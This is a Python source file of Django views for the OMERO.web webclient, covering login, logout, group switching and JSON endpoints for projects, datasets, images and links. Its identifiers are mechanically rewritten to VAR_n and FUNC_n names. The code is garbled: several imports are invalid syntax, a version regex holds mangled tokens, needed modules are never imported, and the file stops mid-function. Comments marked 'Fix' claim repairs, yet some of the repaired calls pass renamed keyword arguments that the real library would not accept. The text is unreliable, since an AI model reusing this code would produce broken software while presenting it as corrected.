from omeroweb.webgateway.util import .get_longs as webgateway_get_longs
from omeroweb.feedback.views import .handlerInternalError
from omeroweb.webclient.decorators import login_required
from omeroweb.webclient.decorators import .render_response
from omeroweb.webclient.show import (
Show,
IncorrectMenuError,
paths_to_object,
paths_to_tag,
)
from omeroweb.decorators import (
ConnCleaningHttpResponse,
parse_url,
TableClosingHttpResponse,
)
from omeroweb.webgateway.util import .getIntOrDefault
from omero.model import (
AnnotationAnnotationLinkI,
DatasetI,
DatasetImageLinkI,
ExperimenterI,
ImageI,
OriginalFileI,
PlateI,
ProjectI,
ProjectDatasetLinkI,
ScreenI,
ScreenPlateLinkI,
TagAnnotationI,
)
from omero import ApiUsageException, ServerError, CmdError
from omeroweb.webgateway.views import LoginView
from . import .tree
try:
    # Python 2: prefer the builtin arbitrary-precision `long` for id parsing.
    # BUG FIX: the previous form (`import .long`) was a syntax error and,
    # even as `import long`, left VAR_241 unbound when it succeeded.
    VAR_241 = long  # noqa: F821
except NameError:
    # Python 3: int already has arbitrary precision.
    VAR_241 = int
# Module-level logger for this views module.
VAR_0 = logging.getLogger(__name__)
VAR_0.info("INIT '%s'" % os.getpid())
# Maximum listing size, derived from the configured base page size.
VAR_1 = settings.PAGE * 100
def FUNC_0(VAR_2, VAR_3, VAR_4):
    """Return the GET parameter VAR_3 (falling back to VAR_4) coerced via
    VAR_241 (long/int); a missing value stays None."""
    VAR_52 = VAR_2.GET.get(VAR_3, VAR_4)
    return None if VAR_52 is None else VAR_241(VAR_52)
def FUNC_1(VAR_2, VAR_3):
    """Return every non-empty value of the repeated GET parameter VAR_3."""
    return [VAR_51 for VAR_51 in VAR_2.GET.getlist(VAR_3) if VAR_51 != ""]
def FUNC_2(VAR_2, VAR_3):
    """Deprecated alias for ``omeroweb.webgateway.util.get_longs()``."""
    VAR_382 = "Deprecated. Use omeroweb.webgateway.util.get_longs()"
    warnings.warn(VAR_382, DeprecationWarning)
    return webgateway_get_longs(VAR_2, VAR_3)
def FUNC_3(VAR_2, VAR_3, VAR_4):
    """Return the GET parameter VAR_3 (default VAR_4) coerced to a boolean."""
    VAR_52 = VAR_2.GET.get(VAR_3, VAR_4)
    return toBoolean(VAR_52)
def FUNC_4(VAR_5):
    """Return VAR_5 if it is a safe redirect target, else the webindex URL."""
    if is_safe_url(VAR_5, allowed_hosts=settings.REDIRECT_ALLOWED_HOSTS):
        return VAR_5
    return VAR_350("webindex")
@never_cache
@render_response()
def FUNC_5(VAR_2, VAR_6=None, **VAR_7):
    """Render the webclient index page, honouring a custom INDEX_TEMPLATE
    and falling back to the default when it cannot be loaded."""
    VAR_53 = {"version": omero_version, "build_year": build_year}
    VAR_53["template"] = "webclient/VAR_93.html"
    if settings.INDEX_TEMPLATE is not None:
        try:
            template_loader.get_template(settings.INDEX_TEMPLATE)
            VAR_53["template"] = settings.INDEX_TEMPLATE
        except Exception:
            # Keep the default template and surface the loading error.
            VAR_53["error"] = traceback.format_exception(*sys.exc_info())[-1]
    return VAR_53
class CLASS_0(LoginView):
    """Webclient login view.

    Renders the login page (with optional logo, public-login and client
    download links) and, after a successful login, clears stale session
    state and redirects to a safe URL.
    """

    VAR_54 = "webclient/login.html"
    VAR_55 = "OMERO.web"

    def FUNC_81(self, VAR_2):
        # GET simply renders the not-logged-in (login) page.
        return self.handle_not_logged_in(VAR_2)

    def FUNC_82(self, VAR_2, VAR_6, VAR_56):
        # Drop session state that may not apply to the new connection.
        if VAR_2.session.get("active_group"):
            if (
                VAR_2.session.get("active_group")
                not in VAR_6.getEventContext().memberOfGroups
            ):
                del VAR_2.session["active_group"]
        if VAR_2.session.get("user_id"):
            del VAR_2.session["user_id"]
        if VAR_2.session.get("server_settings"):
            del VAR_2.session["server_settings"]
        if VAR_2.POST.get("noredirect"):
            return HttpResponse("OK")
        VAR_5 = VAR_2.GET.get("url")
        if VAR_5 is None or len(VAR_5) == 0:
            try:
                VAR_5 = parse_url(settings.LOGIN_REDIRECT)
            except Exception:
                VAR_5 = VAR_350("webindex")
        else:
            VAR_5 = FUNC_4(VAR_5)
        return HttpResponseRedirect(VAR_5)

    def FUNC_83(self, VAR_2, VAR_57=None, VAR_22=None):
        if VAR_22 is None:
            VAR_337 = VAR_2.GET.get("server", VAR_2.POST.get("server"))
            if VAR_337 is not None:
                VAR_115 = {"server": unicode(VAR_337)}
                # BUG FIX: the form was previously constructed from an
                # undefined name; pass the initial-data dict built above.
                VAR_22 = LoginForm(VAR_115=VAR_115)
            else:
                VAR_22 = LoginForm()
        VAR_53 = {
            "version": omero_version,
            "build_year": build_year,
            "error": VAR_57,
            "form": VAR_22,
        }
        VAR_5 = VAR_2.GET.get("url")
        if VAR_5 is not None and len(VAR_5) != 0:
            VAR_53["url"] = urlencode({"url": VAR_5})
        if hasattr(settings, "LOGIN_LOGO"):
            VAR_53["LOGIN_LOGO"] = settings.LOGIN_LOGO
        if settings.PUBLIC_ENABLED:
            VAR_338 = VAR_350("webindex")
            if settings.PUBLIC_URL_FILTER.search(VAR_338):
                VAR_53["public_enabled"] = True
                VAR_53["public_login_redirect"] = VAR_338
        VAR_53["show_download_links"] = settings.SHOW_CLIENT_DOWNLOADS
        if settings.SHOW_CLIENT_DOWNLOADS:
            # Offer client downloads matching this server's major.minor.
            VAR_339 = re.match(
                (
                    r"(?P<major>\VAR_362+)\."
                    r"(?P<minor>\VAR_362+)\."
                    r"(?P<patch>\VAR_362+\.?)?"
                    r"(?P<dev>(dev|a|b|rc)\VAR_362+)?.*"
                ),
                omero_version,
            )
            VAR_340 = "^VAR_414%s\\.%s\\.[^-]+$" % (
                VAR_339.group("major"),
                VAR_339.group("minor"),
            )
            VAR_53["client_download_tag_re"] = VAR_340
            VAR_53["client_download_repo"] = settings.CLIENT_DOWNLOAD_GITHUB_REPO
        return render(VAR_2, self.template, VAR_53)
@login_required(ignore_login_fail=True)
def FUNC_6(VAR_2, VAR_6=None, **VAR_7):
    """Keep-alive ping: responds "OK" whenever the session is still valid."""
    VAR_53 = "OK"
    return HttpResponse(VAR_53)
@login_required()
def FUNC_7(VAR_2, VAR_6=None, VAR_5=None, **VAR_7):
    """Switch the active group (via FUNC_8) then redirect to a safe URL."""
    FUNC_8(VAR_2)
    VAR_51 = VAR_5 if VAR_5 else VAR_350("webindex")
    return HttpResponseRedirect(FUNC_4(VAR_51))
def FUNC_8(VAR_2, VAR_8=None):
    """Record the active group id on the session.

    When no explicit id is given, it is read from the request's
    "active_group" GET parameter. The session is only touched (and
    flagged modified) when the stored value actually changes.
    Raises TypeError/ValueError if the id is missing or non-numeric,
    exactly like the int() coercion it performs.
    """
    if VAR_8 is None:
        VAR_8 = VAR_2.GET.get("active_group")
    group_id = int(VAR_8)
    _unset = object()  # sentinel: distinguishes "absent" from any int
    if VAR_2.session.get("active_group", _unset) != group_id:
        VAR_2.session.modified = True
        VAR_2.session["active_group"] = group_id
def FUNC_9(VAR_2, VAR_9="All members"):
    """Build the pseudo-experimenter representing "everyone" (id -1).

    The display label comes from the session's server settings at
    ui.menu.dropdown.everyone.label, falling back to VAR_9. Like the
    original chained-.get() form, this raises AttributeError when the
    session has no "server_settings" entry at all.
    """
    node = VAR_2.session.get("server_settings")
    for part in ("ui", "menu", "dropdown", "everyone"):
        node = node.get(part, {})
    label = node.get("label", VAR_9)
    return {
        "id": -1,
        "omeName": label,
        "firstName": label,
        "lastName": "",
    }
@login_required(login_redirect="webindex")
def FUNC_10(VAR_2, VAR_6=None, **VAR_7):
    """Log the user out.

    POST: close the gateway connection (best effort -- failures are only
    logged), always flush the session, then redirect to the login view.
    GET: render a confirmation form that POSTs back to this view.
    """
    if VAR_2.method == "POST":
        try:
            try:
                VAR_6.close()
            except Exception:
                VAR_0.error("Exception during FUNC_10.", exc_info=True)
        finally:
            # The session is flushed even if closing the connection failed.
            VAR_2.session.flush()
        return HttpResponseRedirect(VAR_350(settings.LOGIN_VIEW))
    else:
        VAR_53 = {"url": VAR_350("weblogout"), "submit": "Do you want to log out?"}
        VAR_54 = "webgateway/base/includes/post_form.html"
        return render(VAR_2, VAR_54, VAR_53)
def FUNC_11(VAR_2, VAR_10, VAR_6=None, VAR_5=None, **VAR_7):
    """Assemble the template context for a main webclient page.

    VAR_10 is the menu name. Resolves the template, applies any "show"
    pre-selection request, keeps the session's active group/user in sync,
    and returns the context dict (groups, colleagues, forms, settings).
    """
    VAR_2.session.modified = True
    VAR_54 = VAR_7.get("template", None)
    if VAR_54 is None:
        if VAR_10 == "userdata":
            # Fix: path was corrupted to "webclient/VAR_158/..."; the data
            # templates live under webclient/data/.
            VAR_54 = "webclient/data/containers.html"
        elif VAR_10 == "usertags":
            VAR_54 = "webclient/data/containers.html"
        else:
            # Fix: the second format argument was the undefined name
            # `menu`; the menu name is the VAR_10 parameter.
            VAR_54 = "webclient/%s/%s.html" % (VAR_10, VAR_10)
    VAR_59 = VAR_7.get("show", Show(VAR_6, VAR_2, VAR_10))
    try:
        VAR_242 = VAR_59.first_selected
    except IncorrectMenuError as e:
        return HttpResponseRedirect(e.uri)
    VAR_60 = VAR_59.initially_open_owner
    # A "show" was requested but nothing could be selected: a public user
    # may simply lack access, so bounce through the login page.
    if VAR_2.GET.get("show", None) is not None and VAR_242 is None:
        if (
            settings.PUBLIC_ENABLED
            and settings.PUBLIC_USER == VAR_6.getUser().getOmeName()
        ):
            # Fix: query key was corrupted to "VAR_5"; it is "url".
            return HttpResponseRedirect("%s?url=%s" % (VAR_350("weblogin"), VAR_5))
    if VAR_242 is not None:
        FUNC_8(VAR_2, VAR_242.details.group.id.val)
    VAR_61 = {}
    VAR_62 = GlobalSearchForm(VAR_158=VAR_2.GET.copy())
    if VAR_10 == "search":
        if VAR_62.is_valid():
            VAR_61["query"] = VAR_62.cleaned_data["search_query"]
    VAR_5 = VAR_7.get("load_template_url", None)
    if VAR_5 is None:
        VAR_5 = VAR_350(viewname="load_template", args=[VAR_10])
    VAR_8 = VAR_2.session.get("active_group") or VAR_6.getEventContext().groupId
    VAR_63, VAR_64 = VAR_6.getObject("ExperimenterGroup", VAR_8).groupSummary()
    VAR_65 = [u.id for u in VAR_63]
    VAR_65.extend([u.id for u in VAR_64])
    VAR_66 = VAR_2.GET.get("experimenter")
    if VAR_60 is not None:
        if VAR_2.session.get("user_id", None) != -1:
            VAR_66 = VAR_60
    try:
        VAR_66 = VAR_241(VAR_66)
    except Exception:
        VAR_66 = None
    # Discard a requested experimenter who is not in the active group.
    if VAR_66 is not None:
        if (
            VAR_66
            not in (
                set(map(lambda x: x.id, VAR_63)) | set(map(lambda x: x.id, VAR_64))
            )
            and VAR_66 != -1
        ):
            VAR_66 = None
    if VAR_66 is None:
        VAR_66 = VAR_2.session.get("user_id", None)
    if VAR_66 is None or int(VAR_66) not in VAR_65:
        if VAR_66 != -1:  # -1 means "all members" and is always allowed
            VAR_66 = VAR_6.getEventContext().userId
    VAR_2.session["user_id"] = VAR_66
    VAR_67 = list(VAR_6.getGroupsMemberOf())
    # Fix: list.sort() takes the keyword `key`, not `VAR_310`.
    VAR_67.sort(key=lambda x: x.getName().lower())
    VAR_68 = VAR_67
    VAR_69 = ContainerForm()
    VAR_70 = {}
    if VAR_10 == "search":
        for g in VAR_68:
            g.loadLeadersAndMembers()
            for VAR_382 in g.leaders + g.colleagues:
                VAR_70[VAR_382.id] = VAR_382
        VAR_70 = list(VAR_70.values())
        VAR_70.sort(key=lambda x: x.getLastName().lower())
    VAR_53 = {
        "menu": VAR_10,
        "init": VAR_61,
        "myGroups": VAR_67,
        "new_container_form": VAR_69,
        "global_search_form": VAR_62,
    }
    VAR_53["groups"] = VAR_68
    VAR_53["myColleagues"] = VAR_70
    VAR_53["active_group"] = VAR_6.getObject("ExperimenterGroup", VAR_241(VAR_8))
    VAR_53["active_user"] = VAR_6.getObject("Experimenter", VAR_241(VAR_66))
    VAR_53["initially_select"] = VAR_59.initially_select
    VAR_53["initially_open"] = VAR_59.initially_open
    VAR_53["isLeader"] = VAR_6.isLeader()
    VAR_53["current_url"] = VAR_5
    VAR_53["page_size"] = settings.PAGE
    VAR_53["template"] = VAR_54
    VAR_53["thumbnails_batch"] = settings.THUMBNAILS_BATCH
    VAR_53["current_admin_privileges"] = VAR_6.getCurrentAdminPrivileges()
    VAR_53["leader_of_groups"] = VAR_6.getEventContext().leaderOfGroups
    VAR_53["member_of_groups"] = VAR_6.getEventContext().memberOfGroups
    return VAR_53
@login_required()
@render_response()
def FUNC_12(VAR_2, VAR_10, VAR_6=None, VAR_5=None, **VAR_7):
    """Thin view wrapper: forwards all arguments to FUNC_11.

    Fix: the keyword values were the undefined names `request`, `menu`,
    `conn` and `url`; the local parameters are VAR_2/VAR_10/VAR_6/VAR_5.
    """
    return FUNC_11(VAR_2=VAR_2, VAR_10=VAR_10, VAR_6=VAR_6, VAR_5=VAR_5, **VAR_7)
@login_required()
@render_response()
def FUNC_13(VAR_2, VAR_5=None, VAR_6=None, **VAR_7):
    """Context for the group/user dropdown.

    Returns the caller's groups plus -- for admins -- every group except
    the system "user" and "guest" groups, with leaders/members loaded.
    NOTE(review): the template name below looks mangled by identifier
    rewriting ("FUNC_13.html") -- verify against the original file.
    """
    VAR_67 = list(VAR_6.getGroupsMemberOf())
    # Fix: list.sort() takes the keyword `key`, not `VAR_310`.
    VAR_67.sort(key=lambda x: x.getName().lower())
    if VAR_6.isAdmin():  # Admin can see all groups
        VAR_243 = [
            VAR_6.getAdminService().getSecurityRoles().userGroupId,
            VAR_6.getAdminService().getSecurityRoles().guestGroupId,
        ]
        VAR_68 = VAR_6.getObjects("ExperimenterGroup", opts={"load_experimenters": True})
        VAR_68 = [g for g in VAR_68 if g.getId() not in VAR_243]
        VAR_68.sort(key=lambda x: x.getName().lower())
    else:
        VAR_68 = VAR_67
    for g in VAR_68:
        g.loadLeadersAndMembers()  # load leaders / members
    VAR_53 = {
        "template": "webclient/base/includes/FUNC_13.html",
        "current_url": VAR_5,
        "groups": VAR_68,
        "myGroups": VAR_67,
    }
    return VAR_53
@login_required()
def FUNC_14(VAR_2, VAR_6=None, **VAR_7):
    """JSON endpoint: paginated group list, optionally filtered by member."""
    try:
        VAR_87 = FUNC_0(VAR_2, "page", 1)
        VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
        VAR_244 = FUNC_0(VAR_2, "member", -1)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    try:
        # Fix: keyword values referenced the undefined names conn,
        # member_id, page and limit; the locals are VAR_6/VAR_244/VAR_87/VAR_88.
        VAR_68 = tree.marshal_groups(
            VAR_6=VAR_6, VAR_244=VAR_244, VAR_87=VAR_87, VAR_88=VAR_88
        )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse({"groups": VAR_68})
@login_required()
def FUNC_15(VAR_2, VAR_11, VAR_6=None, **VAR_7):
    """JSON endpoint: marshal one experimenter.

    Negative ids return the "everyone" pseudo-experimenter (FUNC_9).
    """
    try:
        VAR_11 = VAR_241(VAR_11)
    except ValueError:
        # Fix: message had a mangled identifier ("VAR_341"); it names the
        # experimenter id parameter.
        return HttpResponseBadRequest("Invalid experimenter id")
    try:
        if VAR_11 < 0:
            VAR_341 = FUNC_9(VAR_2)
        else:
            # Fix: keyword values referenced the undefined names conn and
            # experimenter_id; the locals are VAR_6 and VAR_11.
            VAR_341 = tree.marshal_experimenter(
                VAR_6=VAR_6, VAR_11=VAR_11
            )
        if VAR_341 is None:
            raise Http404("No Experimenter found with ID %s" % VAR_11)
        return JsonResponse({"experimenter": VAR_341})
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
@login_required()
def FUNC_16(VAR_2, VAR_6=None, **VAR_7):
    """JSON endpoint: all top-level containers for one experimenter/group.

    Returns projects, orphan-including datasets, screens, plates and --
    when permitted or enabled -- the orphaned-images folder.
    """
    try:
        VAR_87 = FUNC_0(VAR_2, "page", 1)
        VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
        VAR_20 = FUNC_0(VAR_2, "group", -1)
        VAR_11 = FUNC_0(VAR_2, "id", -1)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    if not VAR_6.isValidGroup(VAR_20):
        return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
    VAR_71 = dict()
    try:
        # Fix (throughout): keyword values referenced undefined names
        # (conn, group_id, experimenter_id, page, limit); use the locals.
        VAR_71["projects"] = tree.marshal_projects(
            VAR_6=VAR_6,
            VAR_20=VAR_20,
            VAR_11=VAR_11,
            VAR_87=VAR_87,
            VAR_88=VAR_88,
        )
        VAR_71["datasets"] = tree.marshal_datasets(
            VAR_6=VAR_6,
            VAR_247=True,
            VAR_20=VAR_20,
            VAR_11=VAR_11,
            VAR_87=VAR_87,
            VAR_88=VAR_88,
        )
        VAR_71["screens"] = tree.marshal_screens(
            VAR_6=VAR_6,
            VAR_20=VAR_20,
            VAR_11=VAR_11,
            VAR_87=VAR_87,
            VAR_88=VAR_88,
        )
        VAR_71["plates"] = tree.marshal_plates(
            VAR_6=VAR_6,
            VAR_247=True,
            VAR_20=VAR_20,
            VAR_11=VAR_11,
            VAR_87=VAR_87,
            VAR_88=VAR_88,
        )
        try:
            VAR_342 = VAR_2.session["server_settings"]["ui"]["tree"]["orphans"]
        except Exception:
            VAR_342 = {"enabled": True}
        # Orphans are shown to admins, group leaders, the owner, or when
        # the server setting enables them for everyone.
        if (
            VAR_6.isAdmin()
            or VAR_6.isLeader(VAR_335=VAR_2.session.get("active_group"))
            or VAR_11 == VAR_6.getUserId()
            or VAR_342.get("enabled", True)
        ):
            VAR_247 = tree.marshal_orphaned(
                VAR_6=VAR_6,
                VAR_20=VAR_20,
                VAR_11=VAR_11,
                VAR_87=VAR_87,
                VAR_88=VAR_88,
            )
            VAR_247["name"] = VAR_342.get("name", "Orphaned Images")
            VAR_71["orphaned"] = VAR_247
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse(VAR_71)
@login_required()
def FUNC_17(VAR_2, VAR_6=None, **VAR_7):
    """JSON endpoint: datasets, optionally restricted to one project."""
    try:
        VAR_87 = FUNC_0(VAR_2, "page", 1)
        VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
        VAR_20 = FUNC_0(VAR_2, "group", -1)
        VAR_245 = FUNC_0(VAR_2, "id", None)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    if not VAR_6.isValidGroup(VAR_20):
        return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
    try:
        # Fix: keyword values referenced the undefined names conn,
        # project_id, group_id, page and limit; use the locals.
        VAR_107 = tree.marshal_datasets(
            VAR_6=VAR_6, VAR_245=VAR_245, VAR_20=VAR_20, VAR_87=VAR_87, VAR_88=VAR_88
        )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse({"datasets": VAR_107})
@login_required()
def FUNC_18(VAR_2, VAR_6=None, **VAR_7):
    """JSON endpoint: images under a dataset/share, or the orphaned list.

    Optional flags request pixel sizes, thumbnail versions and dates.
    """
    try:
        VAR_87 = FUNC_0(VAR_2, "page", 1)
        VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
        VAR_20 = FUNC_0(VAR_2, "group", -1)
        VAR_246 = FUNC_0(VAR_2, "id", None)
        VAR_247 = FUNC_3(VAR_2, "orphaned", False)
        VAR_248 = FUNC_3(VAR_2, "sizeXYZ", False)
        VAR_249 = FUNC_3(VAR_2, "thumbVersion", False)
        VAR_250 = FUNC_3(VAR_2, "date", False)
        VAR_11 = FUNC_0(VAR_2, "experimenter_id", -1)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    if not VAR_6.isValidGroup(VAR_20):
        return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
    VAR_25 = "share_id" in VAR_7 and VAR_241(VAR_7["share_id"]) or None
    try:
        # Fix: keyword values referenced undefined names (orphaned,
        # experimenter_id, dataset_id, share_id, ...); use the locals.
        VAR_106 = tree.marshal_images(
            VAR_6=VAR_6,
            VAR_247=VAR_247,
            VAR_11=VAR_11,
            VAR_246=VAR_246,
            VAR_25=VAR_25,
            VAR_248=VAR_248,
            VAR_20=VAR_20,
            VAR_87=VAR_87,
            VAR_250=VAR_250,
            VAR_249=VAR_249,
            VAR_88=VAR_88,
        )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse({"images": VAR_106})
@login_required()
def FUNC_19(VAR_2, VAR_6=None, **VAR_7):
    """JSON endpoint: plates, optionally restricted to one screen."""
    try:
        VAR_87 = FUNC_0(VAR_2, "page", 1)
        VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
        VAR_20 = FUNC_0(VAR_2, "group", -1)
        VAR_251 = FUNC_0(VAR_2, "id", None)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    if not VAR_6.isValidGroup(VAR_20):
        return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
    try:
        # Fix: keyword values referenced the undefined names conn,
        # screen_id, group_id, page and limit; use the locals.
        VAR_110 = tree.marshal_plates(
            VAR_6=VAR_6, VAR_251=VAR_251, VAR_20=VAR_20, VAR_87=VAR_87, VAR_88=VAR_88
        )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse({"plates": VAR_110})
@login_required()
def FUNC_20(VAR_2, VAR_6=None, **VAR_7):
    """JSON endpoint: plate acquisitions (runs) for one plate."""
    try:
        VAR_87 = FUNC_0(VAR_2, "page", 1)
        VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
        VAR_252 = FUNC_0(VAR_2, "id", None)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    if VAR_252 is None:
        # Fix: message had a mangled identifier ("VAR_419"); the required
        # parameter is the plate id.
        return HttpResponseBadRequest("id (plate) must be specified")
    try:
        # Fix: keyword values referenced the undefined names conn,
        # plate_id, page and limit; use the locals.
        VAR_253 = tree.marshal_plate_acquisitions(
            VAR_6=VAR_6, VAR_252=VAR_252, VAR_87=VAR_87, VAR_88=VAR_88
        )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse({"acquisitions": VAR_253})
def FUNC_21(VAR_6, VAR_12, VAR_13, VAR_14, VAR_15):
    """Find existing parent-child links of the given types.

    Returns a (link_class_name, links) tuple, or None for the "orphaned"
    pseudo-parent or experimenter/dataset|plate|tag combinations (which
    are not links). Raises Http404 when the type pair is not linkable or
    when a specific parent id yields no links.
    """
    if VAR_12 == "orphaned":
        return None
    VAR_72 = None
    if VAR_12 == "experimenter":
        if VAR_14 in ["dataset", "plate", "tag"]:
            # This is not a link: the child is simply orphaned.
            return None
    elif VAR_12 == "project":
        if VAR_14 == "dataset":
            VAR_72 = "ProjectDatasetLink"
    elif VAR_12 == "dataset":
        if VAR_14 == "image":
            VAR_72 = "DatasetImageLink"
    elif VAR_12 == "screen":
        if VAR_14 == "plate":
            VAR_72 = "ScreenPlateLink"
    elif VAR_12 == "tagset":
        if VAR_14 == "tag":
            VAR_72 = "AnnotationAnnotationLink"
    if not VAR_72:
        # Fix: message had mangled identifiers; it describes the expected
        # json payload.
        raise Http404("json data needs 'parent_type' and 'child_type'")
    VAR_73 = omero.sys.ParametersI()
    VAR_73.addIds(VAR_15)
    VAR_74 = VAR_6.getQueryService()
    # Fix: the HQL placeholder was corrupted to ":VAR_187".
    # ParametersI.addIds() binds the parameter named "ids".
    VAR_75 = (
        """
        from %s olink join fetch olink.child join fetch olink.parent
        where olink.child.id in (:ids)
        """
        % VAR_72
    )
    if VAR_13:
        VAR_73.add("pid", rlong(VAR_13))
        VAR_75 += " and olink.parent.id = :pid"
    VAR_76 = VAR_74.findAllByQuery(VAR_75, VAR_73, VAR_6.SERVICE_OPTS)
    if VAR_13 is not None and len(VAR_76) == 0:
        raise Http404(
            "No link found for %s-%s to %s-%s"
            % (VAR_12, VAR_13, VAR_14, VAR_15)
        )
    return VAR_72, VAR_76
def FUNC_22(VAR_12, VAR_13, VAR_14, VAR_16):
    """Create (but do not save) a link object joining a parent to a child.

    Returns the new *Link instance, the string "orphan" when a dataset or
    plate is being moved under an experimenter (i.e. un-parented), or
    None when the parent/child type combination is not linkable.
    """
    if VAR_12 == "experimenter":
        # Moving a dataset/plate to the experimenter level orphans it.
        return "orphan" if VAR_14 in ("dataset", "plate") else None
    if VAR_12 == "project" and VAR_14 == "dataset":
        VAR_344 = ProjectDatasetLinkI()
        VAR_344.setParent(ProjectI(VAR_241(VAR_13), False))
        VAR_344.setChild(DatasetI(VAR_241(VAR_16), False))
        return VAR_344
    if VAR_12 == "dataset" and VAR_14 == "image":
        VAR_344 = DatasetImageLinkI()
        VAR_344.setParent(DatasetI(VAR_241(VAR_13), False))
        VAR_344.setChild(ImageI(VAR_241(VAR_16), False))
        return VAR_344
    if VAR_12 == "screen" and VAR_14 == "plate":
        VAR_344 = ScreenPlateLinkI()
        VAR_344.setParent(ScreenI(VAR_241(VAR_13), False))
        VAR_344.setChild(PlateI(VAR_241(VAR_16), False))
        return VAR_344
    if VAR_12 == "tagset" and VAR_14 == "tag":
        VAR_344 = AnnotationAnnotationLinkI()
        VAR_344.setParent(TagAnnotationI(VAR_241(VAR_13), False))
        VAR_344.setChild(TagAnnotationI(VAR_241(VAR_16), False))
        return VAR_344
    return None
def FUNC_23(VAR_6, VAR_14, VAR_15):
    """Map object id -> owner id for the given object type and id list.

    Tags are looked up as "Annotation" objects; everything else uses the
    type name as-is.
    """
    otype = "Annotation" if VAR_14 == "tag" else VAR_14
    return {
        obj.id: obj.details.owner.id.val
        for obj in VAR_6.getObjects(otype, VAR_15)
    }
@login_required()
def FUNC_24(VAR_2, VAR_6=None, **VAR_7):
    """Dispatch JSON link-editing requests.

    POST creates links (FUNC_25); DELETE removes them (FUNC_26); any
    other method gets a 405 JSON error.
    NOTE(review): the 405 message text and the `VAR_313=405` keyword
    (presumably `status=405`) look mangled by identifier rewriting --
    verify against the original source.
    """
    if VAR_2.method not in ["POST", "DELETE"]:
        return JsonResponse(
            {"Error": "Need to POST or DELETE JSON VAR_158 to VAR_230 links"}, VAR_313=405
        )
    try:
        VAR_17 = json.loads(VAR_2.body)
    except TypeError:
        # Fallback when the body is bytes needing native-str conversion.
        VAR_17 = json.loads(bytes_to_native_str(VAR_2.body))
    if VAR_2.method == "POST":
        return FUNC_25(VAR_6, VAR_17)
    elif VAR_2.method == "DELETE":
        return FUNC_26(VAR_6, VAR_17)
def FUNC_25(VAR_6, VAR_17, **VAR_7):
    """POST handler: create the links described by the nested json dict.

    VAR_17 has the shape {parent_type: {parent_id: {child_type:
    [child_ids]}}}. Admins with the WriteOwned privilege create links
    owned by each child's owner rather than by themselves.
    """
    VAR_78 = {"success": False}
    VAR_79 = []
    VAR_80 = "WriteOwned" in VAR_6.getCurrentAdminPrivileges()
    VAR_66 = VAR_6.getUserId()
    for VAR_12, VAR_82 in VAR_17.items():
        # Orphaned/experimenter "parents" are not real links.
        if VAR_12 in ("orphaned", "experimenter"):
            continue
        for VAR_13, children in VAR_82.items():
            for VAR_14, VAR_15 in children.items():
                VAR_384 = FUNC_23(VAR_6, VAR_14, VAR_15)
                for VAR_16 in VAR_15:
                    VAR_13 = int(VAR_13)
                    VAR_344 = FUNC_22(VAR_12, VAR_13, VAR_14, VAR_16)
                    if VAR_344 and VAR_344 != "orphan":
                        if VAR_80 and VAR_384[VAR_16] != VAR_66:
                            # Create the link as the child's owner.
                            VAR_344.details.owner = ExperimenterI(
                                VAR_384[VAR_16], False
                            )
                        VAR_79.append(VAR_344)
    if len(VAR_79) > 0:
        # NOTE(review): the save group is taken from the *last* parent
        # seen above -- presumably all links share one group; verify.
        VAR_255 = VAR_12.title()
        if VAR_255 in ["Tagset", "Tag"]:
            VAR_255 = "TagAnnotation"
        VAR_256 = VAR_6.getQueryService().get(VAR_255, VAR_13, VAR_6.SERVICE_OPTS)
        VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_256.details.group.id.val)
        VAR_0.info("api_link: Saving %s links" % len(VAR_79))
        try:
            VAR_6.saveArray(VAR_79)
            VAR_78["success"] = True
        except Exception:
            # Bulk save failed: retry one-by-one, best effort.
            VAR_0.info(
                "api_link: Exception on saveArray with %s links" % len(VAR_79)
            )
            for VAR_344 in VAR_79:
                try:
                    VAR_6.saveObject(VAR_344)
                except Exception:
                    pass
            VAR_78["success"] = True
    return JsonResponse(VAR_78)
def FUNC_26(VAR_6, VAR_17):
    """DELETE handler: remove the links described by the nested json dict.

    VAR_17 has the shape {parent_type: {parent_id: {child_type:
    [child_ids]}}}. After deletion, the response reports the remaining
    links each child still has to *other* parents of the same type, so
    the client can keep those tree nodes.
    """
    VAR_78 = {"success": False}
    for VAR_12, VAR_82 in VAR_17.items():
        if VAR_12 == "orphaned":
            continue
